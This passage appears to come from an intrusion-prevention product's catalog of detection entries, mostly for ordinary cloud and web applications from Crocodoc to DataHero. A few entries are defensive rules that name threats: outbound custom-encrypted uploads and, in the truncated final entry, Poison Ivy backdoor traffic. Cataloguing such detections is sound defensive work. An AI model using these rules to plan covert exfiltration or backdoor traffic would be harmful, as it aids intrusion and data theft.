Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Crocodoc takes your PDFs, Word documents, and PowerPoint presentations, and lets you view and mark them up online. All files are stored securely on servers, and can be password protected and encrypted for maximum security.
Back to top

CrossBrowserTesting

About this situation: Application CrossBrowserTesting detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CrossBrowserTesting.com provides cross browser compatibility testing across browsers and operating systems. Automated screenshots and Live browser testing of ajax, css javascript.
Back to top

CrossLoop

About this situation: CrossLoop usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-537-5211
Last changed: sgpkg-ips-628-5211
Description: CrossLoop is a remote desktop service which allows users to share their computer screens and collaborate with others over the Internet.
Back to top

Crossroads

About this situation: Application Crossroads detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Crossroads - cloud applications, comprehensive suite of web-based business applications. CRM, HR, Document Management, Asset Management, Contracts management, Project and Programme Management
Back to top

Crowdbase

About this situation: Application Crowdbase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Crowdbase is app you need to centralize, share and find your company's knowledge, all in one private and secure environment.You can also let knowledge come to you by connecting relevant RSS feeds, Twitter accounts and hashtags as well as web searches.
Back to top

Crowdbooster

About this situation: Application Crowdbooster detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Crowdbooster measures and optimizes your social media marketing by providing powerful, easy-to-use analytics and recommendations on Twitter and Facebook.
Back to top

Crowdcurity

About this situation: Application Crowdcurity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Crowdcurity is a marketplace where businesses can crowdsource security by connecting with security researchers.
Back to top

Crowdflower

About this situation: CrowdFlower usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: CrowdFlower software as a service platform allows users to access an online workforce of millions of people to clean, label and enrich data.
Back to top

Crowdin

About this situation: Application Crowdin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Crowdin is the localization management platform for mobile apps, web, desktop software and related assets.
Back to top

Crowdmap

About this situation: Application Crowdmap detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Crowdmap is a tool that allows you to crowdsource information and see it on a map and timeline. It enables anyone to run their own crowdsourcing site without having to know the intricacies of running their own server.
Back to top

CrowdProcess

About this situation: Application CrowdProcess detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CrowdProcess helps companies take full advantage of advanced scientific computing capabilities, including machine learning and advanced optimization.
Back to top

Crowdspring

About this situation: crowdSPRING usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Crowdspring provides customers with creative services on a custom logo design, website design, other graphic design.
Back to top

CrowdStrike

About this situation: CrowdStrike usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1256-5242
Description: CrowdStrike is a US based security company. The CrowdStrike portfolio includes a range of services from endpoint antivirus solutions to breach response activities.
Back to top

Crowdtorch

About this situation: CrowdTorch usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: This site provides and audience management platform; it offers features such as ticketing, social networking, event website, and analytics.
Back to top

Crownpeak

About this situation: Crownpeak
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing, Application Routing
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Description: Crownpeak makes a suite of compliance and monitoring solutions for digital experiences.
Back to top

CRS-On-Demand

About this situation: Application CRS-On-Demand detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CRS On-demand is a Consumer Relationship System
Back to top

Crucial

About this situation: Application Crucial detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Crucial is a manufacturer of storage and computer components.
Back to top

Crump-Life-Insurance

About this situation: Application Crump-Life-Insurance detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Crump Life Insurance Services is wholesale distributor of insurance.
Back to top

Crunch-Accounting---UK

About this situation: Application Crunch-Accounting---UK detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Crunch Accounting delivers a complete business accountancy service.
Back to top

CrunchBase

About this situation: Application CrunchBase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CrunchBase is the platform to discover companies and the people behind them.
Back to top

Cryptocat

About this situation: Cryptocat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-1096-5242
Description: Cryptocat is an open source chat application for encrypted conversations. It is currently available as an iOS application or a web browser plugin.
Back to top

Cryptzone

About this situation: Application Cryptzone detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cryptzone is a provider of network security and protection, offering data security, content governance and app security solutions for data protection.
Back to top

Crystal-and-Co

About this situation: Application Crystal-and-Co detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Crystal and Co provides insurance and risk management solutions to clients in the United States and internationally.
Back to top

CS-VUE-Suite

About this situation: Application CS-VUE-Suite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CS-VUE is an online product suite that encourages environmentally sustainable business practices and corporate environmental responsibility through systematic statutory risk management.
Back to top

CSB

About this situation: Application CSB detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CSB-System is consistently specializing in the process and retail industry and has successfully developed the company using our own financial means. Continuous sales increases both in Germany and abroad confirm the success of our turnkey, industry-specific business IT solution.
Back to top

Csc-Cloud

About this situation: CSC Cloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: Allowes users to backup Files to the Cloud.
Back to top

CSCampus-Dashboard

About this situation: Application CSCampus-Dashboard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Advanced cloud management and software for academic institutions. These services include data integration services for academic and non-academic software, cloud security, admission systems, record management and constituent management.
Back to top

CSGInternational

About this situation: Application CSGInternational detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CSGInternational is a business support solutions and services company serving communications service providers, including mobile networks. It offers a licensed and Software-as-a-Service
Back to top

Ctg

About this situation: Application Ctg detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Computer Task Group, Incorporated
Back to top

Cubby

About this situation: Cubby usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description: This service allows users to store and access files across computers, mobile devices, and the Internet.
Back to top

Cube-Anywhere

About this situation: Application Cube-Anywhere detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cube for businesses, contractors, consultants, developers and freelancers that need to track their time and expenses and keep tabs on project costs.
Back to top

CubeSocial

About this situation: Application CubeSocial detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CubeSocial - Social CRM, social media marketing and consulting service.
Back to top

Cubetree

About this situation: Application Cubetree detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CubeTree Enterprise social networking software offers full-featured enterprise collaboration tools that are tightly integrated with your profile, your micro-blogging capabilities and your groups.
Back to top

Cubilis

About this situation: Application Cubilis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cubilis provides software for management of hotel.
Back to top

Cubrid

About this situation: Cubrid usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-623-5211
Description: CUBRID is an open source database management system, which provides a multi-threaded and multi-server architecture.
Back to top

Cultural Institutions

About this situation: Sites sponsored by museums, galleries, theatres (but not movie theatres), libraries and similar institutions; also, sites whose purpose is the display of artworks.
Context: URL Application Context
Severity: 1
Tags: Education, Productivity Loss, Private Data
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by museums, galleries, theatres (but not movie theatres), libraries and similar institutions; also, sites whose purpose is the display of artworks.
Back to top

Curbed

About this situation: Curbed usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1764-5242
Description: Curbed usage detected. Curbed is an interior decoration, decor and real estate magazine by Vox Media.
Back to top

Curdbee/Hiveage

About this situation: CurdBee/hiveage usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: CurdBee is online billing software for small businesses and freelancers to simplify your invoicing.
Back to top

Curemd

About this situation: Application Curemd detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CureMD is an network of health information management systems and services, offering certified EMR, practice management, patient portal and medical billing to help accelerate adoption and Meaningful Use qualification-driving outcomes and subsidy payments to maximize value and returns.
Back to top

Current-Analysis

About this situation: Application Current-Analysis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Current Analysis, Inc. provides market intelligence solutions and advisory services to telecommunications, information technology
Back to top

Curse

About this situation: Curse usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

CURTIS-Digital

About this situation: Application CURTIS-Digital detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CURTIS Digital is a full-service software development firm and specializes in user experience, enterprise portals, mobile and web apps.
Back to top

CushyCMS

About this situation: Application CushyCMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CushyCMS is hosted content management system that's actually easy to use, fast to setup and doesn't require programming skills.
Back to top

Custom-Encrypted Uploads

About this situation: Outbound network transmissions of documents, payloads, and data that have been encrypted using custom encryption methods.
Context: URL Application Context
Severity: 1
Tags: Security, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Outbound network transmissions of documents, payloads, and data that have been encrypted using custom encryption methods.
Back to top

CustomCall-Webtop-BPM

About this situation: Application CustomCall-Webtop-BPM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CustomCall Data Systems provides billing, OSS and business process management solutions for telecommunications service providers
Back to top

Customer-Relationship-Management

About this situation: Application Customer-Relationship-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Customer Relationship Management provides ability to keep track of customers, leads and competitors with CRM software.
Back to top

Customer-Thermometer

About this situation: Application Customer-Thermometer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Customer Thermometer monitors your customers views in real time. If you know what they're thinking, you have a fighting chance of fixing it.
Back to top

Customer.io

About this situation: Application Customer.io detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Customer.io is a platform that uses application data and rules to message users.
Back to top

CustomerGauge

About this situation: Application CustomerGauge detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CustomerGauge is a Software-as-a-Service (SaaS) platform that uses Net Promoter to measure and report on customer feedback in real time.
Back to top

CustomerSure

About this situation: Application CustomerSure detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CustomerSure is web-based software to help you collect, share and act on customer feedback.
Back to top

Cvent

About this situation: Cvent usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: Cvent, Inc. is a publicly held software-as-a-service company that specializes in meetings management technology. The company offers web-based software for meeting site selection, online event registration, event management, email marketing, and web surveys.
Back to top

cvMail

About this situation: Application cvMail detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: cvMail - Global E-Recruitment solutions
Back to top

CVS

About this situation: Concurrent Versions System (CVS) traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: Concurrent Versions System (CVS) usage. CVS is a free software revision control system.
Back to top

CVS-Photo

About this situation: Application CVS-Photo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quality photo prints, photo greeting cards and photo books for pick up at your local CVS Pharmacy. Create a photo print, a photo card or photo book in minutes.
Back to top

CVWarehouse

About this situation: Application CVWarehouse detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CVWarehouse is a candidate- and company portal that introduces companies to candidates and candidates to companies.
Back to top

CWJobs---Recruiters

About this situation: Application CWJobs---Recruiters detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CWJobs.co.uk is IT recruitment website serving contract and permanent IT jobseekers, enabling them to apply for jobs across all skills and industry sectors throughout the UK and Ireland.
Back to top

CX

About this situation: Application CX detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cx is a personal cloud computing and productivity platform designed as a simple, self-managing system that frees you from the restrictions of any of your individual devices and puts all of your information in a single, safe place that you can reach from anywhere.
Back to top

Cxense

About this situation: Cxense usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-628-5211
Description: Cxense provides an on-line advertising and analytics services.
Back to top

Cyanic-HSE

About this situation: Application Cyanic-HSE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cyanic HSE is software that improves the efficiency of business by minimizing the paperwork and overhead of safety and regulatory programs.
Back to top

Cybage

About this situation: Application Cybage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cybage Software Pvt. Ltd. is a technology consulting organization specializing in outsourced product engineering services. Cybage works with some of the Independent Software Vendors
Back to top

CyberArk

About this situation: Application CyberArk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Cyber-Ark Software provides information technology security solutions that protect organizations from cyber attacks.
Back to top

CyberArk Endpoint Privilege Manager

About this situation: Endpoint Context Agent based CyberArk Endpoint Privilege Manager
Context: EI Correlation
Severity: 1
Tags: Security, Endpoint
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Description: CyberArk Endpoint Privilege Manager endpoint application has been detected.
Back to top

CyberEars

About this situation: CyberEars usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-754-5211
Description: CyberEars is an audio distribution service, especially aimed for podcast distibution.
Back to top

CyberGrants

About this situation: Application CyberGrants detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CyberGrants is Application Service Provider of grants management software to corporate and private grant making organizations.
Back to top

CyberSource-Business-Center

About this situation: Application CyberSource-Business-Center detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cybersource is a provider of Credit Card Processing for Business, Electronic Payment and Risk Management Solutions, it also provides solutions to enable electronic payment, avoid online credit card fraud and credit card processing for Web, Call center and POS environments.
Back to top

CyberU

About this situation: Application CyberU detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CyberU is the global e-learning destination for consumers, small businesses, and enterprises to buy, sell, and track online education and training.
Back to top

Cyfe

About this situation: Application Cyfe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cyfe is an all-in-one dashboard that helps you monitor and analyze data found across all your online services like Google Analytics, Salesforce, AdSense, MailChimp, Amazon, Facebook, WordPress, Zendesk, Twitter and more from one single location in real-time.
Back to top

Cyient

About this situation: Application Cyient detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cyient create and deliver services that enhance your business agility. Cyient solutions enable major organizations worldwide to achieve measurable and substantial benefits. Solutions include product development and life-cycle support, process and network engineering, plus data transformation and analytics.
Back to top

Cyphertite

About this situation: Application Cyphertite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cyphertite - state-of-the-science, deduplicating, encrypted backup system
Back to top

Cypress-Semiconductor

About this situation: Application Cypress-Semiconductor detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cypress Semiconductor Corporation designs, develops, manufactures, markets, and sells embedded system solutions worldwide. It operates in two segments, Microcontroller and Connectivity Division and Memory Products Division.
Back to top

Cyscape

About this situation: Application Cyscape detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: cyScape provide Intelligent Browser and System Analysis tools and technologies. cyScape's BrowserHawk product is the selling software used by developers to help ensure a Flawless Web Experience for every site visitor. cyScape is a financially sound company.
Back to top

Cyworld

About this situation: Cyworld usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-595-5211
Description: This site allows users to create their own profiles, decorate a virtual apartment-like room, and join groups of friends. Source: Wikipedia
Back to top

D-Sight---Analyze

About this situation: Application D-Sight---Analyze detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: D-Sight develops decision making software solutions designed to meet the real needs of consumers, for better group and business decisions.
Back to top

DaCast

About this situation: Application DaCast detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DaCast offers a fully integrated, self-service, live and on-demand streaming platform.
Back to top

Daegis

About this situation: Application Daegis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Daegis Inc. delivers technologies that enable companies to meet their information governance and data retention objectives in an efficient and cost effective manner. Customers migrate their applications and email systems to modern frameworks and platforms respectively using Daegis Composer Migration products, mobilize their business applications with the TD Mobile development environment, store large amounts of data while conducting ECA and data analysis with the AXS-One archiving solution and manage the litigation lifecycle with the Daegis eDiscovery Edge platform
Back to top

DailyBurn

About this situation: Application DailyBurn detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DailyBurn is a health and fitness company that provides workout and nutrition programs on a variety of web, mobile, and TV apps.
Back to top

Dailymile

About this situation: Dailymile usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-630-5211
Description: Dailymile is a social workout tracking and sharing website.
Back to top

Dailymotion

About this situation: Dailymotion usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-429-4219
Last changed: sgpkg-ips-1085-5242
Description: Dailymotion is a website that allows users to upload and watch live streaming video.
Back to top

Daisygroupplc

About this situation: Application Daisygroupplc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Daisy is an enabler of digital change
Back to top

DAKCS

About this situation: Application DAKCS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DAKCS Software Systems simplifying the business, accounts receivable and collection management by creating innovative cloud and on premise software solutions.
Back to top

Dameware-Mini-Remote-Control

About this situation: Dameware Mini Remote Control traffic
Context: Application Context
Severity: 1
Tags: Protocols, Remote control
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-628-5211
Description: DameWare provides Remote Support and Remote Control clients to provide remote access and administration.
Back to top

Danaher

About this situation: Application Danaher detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Danaher Corporation designs, manufactures, and markets professional, medical, industrial, and commercial products and services worldwide.
Back to top

DanskeBank

About this situation: DanskeBank usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1764-5242
Description: DanskeBank usage detected. DanskeBank is a European banking corporation.
Back to top

Daptiv

About this situation: Application Daptiv detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Daptiv's on-demand and flexible PPM solutions improves strategic planning and business execution of companies/subscribers. It also offers expert professional services.
Back to top

DAQFactory

About this situation: DAQFactory usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-636-5211
Description: DAQFactory software provides powerful, flexible and affordable solutions to the challenges of using a computer to communicate with real world devices. Innovative features, such as the ability to make changes on the fly, without stopping and rebuilding application.
Back to top

Dashlane

About this situation: Application Dashlane detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dashlane provides password manager software. Save receipts, payment types, passwords and personalize your digital wallet.
Back to top

Dassault-Systemes

About this situation: Application Dassault-Systemes detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DASSAULT SYSTEMES PLM provides Product Lifecycle Management solutions, simulation and CAD software from empower users to create products in 3D.
Back to top

Data Provider Error

About this situation: Data Provider Error
Context: URL Application Context
Severity: 2
Tags: Data Provider Error, Legal Liability
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Threatseeker data provider query returned an error.
Back to top

Data-BaGG

About this situation: Application Data-BaGG detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Databagg is online storage service based on cloud computing platform.
Back to top

DataBliss

About this situation: Application DataBliss detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DataBliss is the company in monitoring consumer generated media analysis.
Back to top

Databox

About this situation: Application Databox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Databox Mobile BI platform is the decision making chain in analytics of Big Data.
Back to top

DataCare

About this situation: Application DataCare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DataCare provides a Software as a Service (Saas) workflow solution that helps to expedite medical case management, utilization review, claims and billing processes.
Back to top

Datacert

About this situation: Application Datacert detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ELM Solutions, a Wolters Kluwer business, by combining the operations of Datacert and TyMetrix, the two Enterprise Legal Management pioneers and leaders. Having pioneered the ELM market, today ELM Solutions provide transformational, technology-based solutions for the legal industry ecosystem, delivering total solutions to address the intricate complexities facing corporate legal departments, law firms, claims departments, and risk and compliance organizations.
Back to top

Datadeliver

About this situation: Datadeliver usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1764-5242
Description: A file storage and sharing service
Back to top

DataDog

About this situation: Application DataDog detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Datadog is a SaaS-based monitoring and analytics platform for IT infrastructure, operations and development teams. It brings together data from servers, databases, applications, tools and services to present a unified view of the applications that run at scale in the cloud.
Back to top

DataHero

About this situation: Application DataHero detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DataHero is self-service cloud BI that allows user to connect to cloud services. DataHero enabling users to identify and understand the metrics that drive their business.
Back to top

Datalength-TCP_Poison-Ivy-Traffic

About this situation: Poison Ivy backdoor network traffic detected
Context: TCP DataLength Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-625-5211
